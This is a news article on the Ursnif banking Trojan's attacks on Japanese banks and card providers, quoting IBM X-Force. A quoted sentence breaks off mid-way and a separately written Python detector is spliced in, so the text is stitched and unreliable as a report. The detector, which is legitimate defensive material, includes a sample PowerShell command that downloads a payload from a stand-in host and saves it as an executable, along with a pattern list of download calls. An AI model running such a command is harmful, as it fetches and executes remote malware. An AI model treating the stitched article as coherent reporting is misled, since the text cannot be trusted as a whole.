Japan Banks Constantly Being Harassed by Trojan Campaigns

According to security experts, the financial sector of Japan began experiencing a sharp surge in cyber-attacks two months ago.

Japan’s financial sector has seen an increased number of attacks since September, which has prompted Japanese payment card providers and banks to strengthen their security measures.

IBM’s executive security advisor Limor Kessem published the findings in a blog post on October 26, writing: “Ursnif (aka Gozi) banking Trojan was the most active malware code in the financial sector in 2016 and 2017.”

The group of cybercriminals currently running the Ursnif banking Trojan has increased the number of attacks performed against Japan, including a step-up in the spam campaign used to deliver the malware, according to cybersecurity experts. In addition, experts from IBM’s X-Force team have reported that attackers have been running Trojan campaigns such as Ursnif against several regions and countries, including North America, Europe, Australia, Japan and North Korea.

Ursnif has also been targeting banks in Poland, Bulgaria, the Czech Republic and Spain in 2017. According to experts, Japan has been under active attack from the malware for five years.

“One of its [Ursnif’s] most popular targets in 2017 has been Japanese banks,” Kessem said. He added: “In terms of targets, Ursnif malware configurations can be a mixed bag at times, but those targeting Japan are specific to banks and payment card providers in the country.” He also noted that, since the list of targets has remained unchanged across all campaigns, the same group is probably behind every one of them.

However, many experts have warned that the attackers have extended their range of actions to “target access data for cloud storage, cryptocurrency exchange platforms, e-commerce sites, and local email.” The methods the group uses to target Japanese users include web-injection attacks, page redirections, and grabbing data from secure sessions.

Kessem also described the infection chain in the blog post: “users receive an HTML link that leads to an archive (.zip) file containing JavaScript, which launches a PowerShell script that fetches the payload from a remote server and infects the user with Ursnif.” He also explained why the malware has evaded sandbox detection: “Sandbox detection has not been very successful as
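The infection chain described above (archive-delivered JavaScript that spawns a PowerShell downloader) leaves a recognisable parent/child process pattern in endpoint telemetry. The following is an added detection example, not code from the original article or from IBM X-Force: it runs over constructed, Sysmon-like process-creation events (the field names, paths, user name and the `example.invalid` URL are all assumptions made up for the example) and flags a Windows script host started from a temp or archive path, a PowerShell child of that script host whose command line contains a download-capable call, and then correlates the two into one chain.

```python
import re

# Constructed sample process-creation events in a Sysmon-like shape.
# Field names, paths, the user name and the URL are made up for this example.
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 3900,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\AppData\Local\Temp\invoice_2017.zip\invoice.js"'},
    {"pid": 4120, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/payload.bin',"
                "'C:\\Users\\alice\\AppData\\Local\\Temp\\payload.exe')\""},
    # Benign: PowerShell started directly by the shell, no download call.
    {"pid": 5000, "ppid": 3900,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents"},
    # Benign: a logon script run from a fixed, non-temp location.
    {"pid": 5200, "ppid": 5100,
     "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.js"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Script file extensions the Windows Script Host executes directly.
SCRIPT_EXT = re.compile(r"\.(js|jse|wsf)\b", re.IGNORECASE)
# The script was opened out of a temp folder or straight out of a .zip archive.
ARCHIVE_OR_TEMP = re.compile(r"\\temp\\|\.zip\\", re.IGNORECASE)
# PowerShell calls commonly used to fetch a second-stage payload.
DOWNLOAD_CALLS = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer|\biwr\b",
    re.IGNORECASE)

STAGE_SCRIPT_HOST = "script_host_from_archive"
STAGE_DOWNLOADER = "powershell_downloader_from_script_host"


def basename(path):
    """Lower-cased file name of a Windows path (last component only)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the stage label an event matches, or None if it looks benign."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["cmdline"]
    if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd) and ARCHIVE_OR_TEMP.search(cmd):
        return STAGE_SCRIPT_HOST
    if image == "powershell.exe" and parent in SCRIPT_HOSTS and DOWNLOAD_CALLS.search(cmd):
        return STAGE_DOWNLOADER
    return None


def detect_events(events):
    """Run classify() over every event and collect the ones that match a stage."""
    alerts = []
    for ev in events:
        stage = classify(ev)
        if stage:
            alerts.append({"pid": ev["pid"], "ppid": ev["ppid"],
                           "stage": stage, "cmdline": ev["cmdline"]})
    return alerts


def correlate_chains(alerts):
    """Pair each flagged PowerShell downloader with the flagged script host that spawned it.

    Returns (script_host_pid, powershell_pid) tuples; a full chain is a much
    stronger signal than either stage on its own.
    """
    hosts = {a["pid"] for a in alerts if a["stage"] == STAGE_SCRIPT_HOST}
    return [(a["ppid"], a["pid"]) for a in alerts
            if a["stage"] == STAGE_DOWNLOADER and a["ppid"] in hosts]


if __name__ == "__main__":
    found = detect_events(SAMPLE_EVENTS)
    for alert in found:
        print(f"[{alert['stage']}] pid={alert['pid']} ppid={alert['ppid']}: {alert['cmdline']}")
    for host_pid, ps_pid in correlate_chains(found):
        print(f"CHAIN: script host {host_pid} -> PowerShell downloader {ps_pid}")
```

The two benign events show why the chain matters: a PowerShell process on its own, or a script host running a logon script from a fixed location, is routine on a workstation, so each rule alone would be noisy. Requiring the archive/temp origin on the parent and a download-capable command line on the child, and then joining the two by process id, keeps the alert tied to the delivery pattern the article describes. In production the same logic would read real Sysmon Event ID 1 records rather than the constructed list.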

Kessem also noted that organized cybercrime in Japan does not have a long history. “In most cases of malware migration, cybercriminal groups with adequate resources are looking for easier money, less security and an element of surprise for users who are less accustomed to their spam ploys and social engineering during the banking session,” he wrote.

“Even on the internet, gangs often stick to their own turf,” the report said, which explains why larger cybercriminal groups have stayed away from Japan. “Organized groups need connections with local money-laundering and cybercrime groups, which helps explain why other organized groups such as Dridex and TrickBot, both of which target banks in as many as 40 countries, have largely stayed away from Japan,” it added.